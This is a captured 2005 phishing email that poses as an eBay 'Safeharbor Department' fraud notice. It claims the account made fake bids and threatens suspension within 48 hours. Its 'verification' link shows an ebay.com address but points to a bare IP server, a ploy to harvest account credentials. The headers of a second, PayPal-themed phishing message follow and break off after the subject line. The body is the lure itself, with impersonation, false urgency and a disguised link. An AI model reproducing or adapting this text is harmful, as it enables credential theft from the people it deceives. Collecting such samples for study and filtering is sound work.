From: "Jacklyn B. Armstrong" <j.armstrongap@ebay.com>
To: jose@monkey.org
Subject: =?ISO-8859-1?B?RWJheSBBY2NvdW50IFJldmlldyAgICB1OQ==?=
Date: Mon, 04 Jul 2005 02:31:57 +0000
MIME-Version: 1.0
X-Sender: <j.armstrongap@ebay.com>
Sender: <j.armstrongap@ebay.com>
Reply-To: "Jacklyn B. Armstrong" <j.armstrongap@ebay.com>
In-Reply-To: <111901c57f02$7492dbf5$aee284a3@bj7bmvc>
X-Mailer: Pegasus Mail for Win32 (v3.12a)
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: 8bit
Status: O
X-Status: 
X-Keywords:                  
X-UID: 94

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Untitled Document</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body>

</td></tr> 
</table> 
</form></td> 
</tr> 
</table> 
<br> 


<div id=message> 
<table cellpadding=0 cellspacing=0 border=0 width="100%""><tr><td> 


<table cellSpacing="0" cellPadding="0" width="600" align="center" 
border="0"> 
  <tbody> 
    <tr> 
      <td><A target="_blank" 
href="http://www.ebay.com"    ><IMG 
src="http://pics.ebaystatic.com/aw/pics/navbar/eBayLogoTM.gif"border=0></A></td> 
    </tr> 
    <tr> 
      <td> </td> 
    </tr> 
    <tr> 
      <td><font color="#000000" size="3" face="Arial, Helvetica, 
sans-serif"><strong>***Urgent Safeharbor 
Department Notice***</strong></font></td> 
    </tr> 
    <tr> 
      <td> </td> 
    </tr> 
  </tbody> 
</table> 
<table cellSpacing="0" cellPadding="5" width="600" align="center" 
border="0"> 
  <tbody> 
    <tr> 
      <td height="259" vAlign="top"> <p>              <font size="2" 
face="Arial, Helvetica, 
sans-serif"><strong>eBay Fraud Mediation Request</strong><br> 
            <font size="1" face="Verdana, Arial, Helvetica, 
sans-serif">Date: July 2005</font></font></p> 
        <p><font size="2" face="Arial, Helvetica, sans-serif">You have 
recieved this email because you or 
someone had used your account to make fake bids at eBay. For security 
purposes, we are required to open 
an investigation into this matter. </font></p> 
        <p><font size="2" face="Arial, Helvetica, sans-serif">          THE 
FRAUD ALERT ID CODE 
CONTAINED IN THIS MESSAGE WILL BE ATTACHED IN 
          OUR FRAUD MEDIATION REQUEST FORM, IN ORDER TO VERIFY YOUR EBAY 
ACCOUNT 
REGISTRATION INFORMATIONS.</font></p> 
        <p><font size="2" face="Arial, Helvetica, sans-serif"><strong>Fraud 
Alert ID CODE: 
00937614</strong><br> 
            <font size="1" face="Verdana, Arial, Helvetica, 
sans-serif">(Please save this Fraud Alert ID Code 
for your reference.</font>)<br> 
          <br> 
          To help speed up this process, 
          please access the following form to complete the verification of 
your eBay account registration 
informations:</font></p> 
        <p><strong><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://61.56.245.39:81/ebay/">http://scgi.ebay.com/verify_id­=ebay 
&fraud alert id code=00937614</a></font></stro­ng></p> 
        <table width="100%"  border="0" cellspacing="0" cellpadding="0"> 
          <tr> 
            <td><p><font size="1">.</font></p>            </td> 
          </tr> 
          <tr> 
            <td><table width="100%"  border="0"> 
              <tr> 
                <td bgcolor="#E6E6FF"><font size="2" face="Arial, Helvetica, 
sans-serif"><strong>Please Note: 
</strong><br> 
                  If we do not receive the appropriate eBay account 
verification within 48 hours, then we will 
assume this eBay account is fraudulent and will be suspended. <br> 
                  The purpose of this verification is to ensure that your 
eBay account has not been fraudulently 
used and to combat the fraud from our community.</font></td> 
              </tr> 
            </table></td> 
          </tr> 
        </table> 
        <p><font size="2" face="Arial, Helvetica, sans-serif"><font 
color="#000000">We appreciate your 
support and understanding, as we work together to keep eBay a safe place to 
trade.</font></font><font 
color="#000000" size="2" face="Arial, Helvetica, sans-serif"><BR> 
          <BR> 
  Thank you for your patience in this matter.</font></p> 
        <p align="left"><font color="#000000" size="2" face="Arial, 
Helvetica, sans-serif">Regards, 
Safeharbor Department (Trust and Safety Department)<br> 
  eBay Inc.</font><font size="2" face="Arial, Helvetica, sans-serif"><br> 
          <br> 
          <font color="#999999" size="1"> Please do not reply to this e-mail 
            as this is only a notification. Mail sent to this address cannot 
be 
      answered. </font></font></p>        </td> 
    </tr> 
    <tr> 
      <td align="middle" ><p align="center"><font color="#000000" size="1" 
face="Arial, 
Helvetica, sans-serif"><Br> 
          <br> 
          Copyright © 2005 eBay Inc. All Rights Reserved. Designated 
trademarks and brands are the 
property of their respective owners. eBay and the eBay logo are trademarks 
of eBay Inc. eBay is located at 
2145 Hamilton Avenue, San Jose, CA 95125. </font><br> 
        </p> 
      </td> 
    </tr> 
  </tbody> 
</table> 


</td></tr></table> 
</div> 


</td></tr></table> 


</td></tr></table> 
</div> 


</td></tr></table> 


</td></tr></table> 
</div> 
</body>
</html>


From temp@localhost.localdomain  Sun Jul  3 14:00:46 2005
Return-Path: <temp@localhost.localdomain>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail1.monkey.org (mail1.monkey.org [65.23.81.153])
	by naughty.monkey.org (Postfix) with ESMTP id 52E4B536EE3
	for <jose@login.monkey.org>; Sun,  3 Jul 2005 14:00:46 -0400 (EDT)
Received: from localhost.localdomain (unknown [222.122.45.219])
	by mail1.monkey.org (Postfix) with ESMTP id 2E00285AB99
	for <jose@monkey.org>; Sun,  3 Jul 2005 14:00:44 -0400 (EDT)
Received: from localhost.localdomain (localhost.localdomain [127.0.0.1])
	by localhost.localdomain (8.12.8/8.12.8) with ESMTP id j63I0c8s006390
	for <jose@monkey.org>; Mon, 4 Jul 2005 03:00:38 +0900
Received: (from temp@localhost)
	by localhost.localdomain (8.12.8/8.12.8/Submit) id j63I0cTX006386;
	Mon, 4 Jul 2005 03:00:38 +0900
Date: Mon, 4 Jul 2005 03:00:38 +0900
Message-Id: <200507031800.j63I0cTX006386@localhost.localdomain>
To: jose@monkey.org
Subject: Login And  Verify Your PayPal account***
